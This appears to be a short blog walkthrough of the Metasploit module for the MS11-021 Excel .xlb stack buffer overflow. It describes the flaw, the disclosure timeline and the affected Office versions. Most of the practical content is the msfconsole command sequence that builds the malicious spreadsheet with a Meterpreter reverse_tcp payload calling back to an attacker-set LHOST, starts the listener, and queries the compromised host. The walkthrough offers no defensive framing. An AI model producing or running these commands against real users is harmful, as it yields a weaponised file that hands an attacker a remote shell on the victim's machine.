This module exploits a vulnerability found in Excel of Microsoft Office 2007 By Supplying a malformed .xlb file , an attacker can control the content (source) of the memcpy routine , and the number of bytes to copy , therefore causing a stack based buffer overflow . This results arbitary code execution under the context of user.Vulnerability discovered and reported to ZDI by Aniway Vulnerability reported to vendor by ZDI the 2010-10-18 Coordinated release of the vulnerability the 2011-04-12 Metasploit PoC provided the 2011-11-05.
Affected version(s) :
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2
Commands:
use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
getuid
sysinfo
Posts
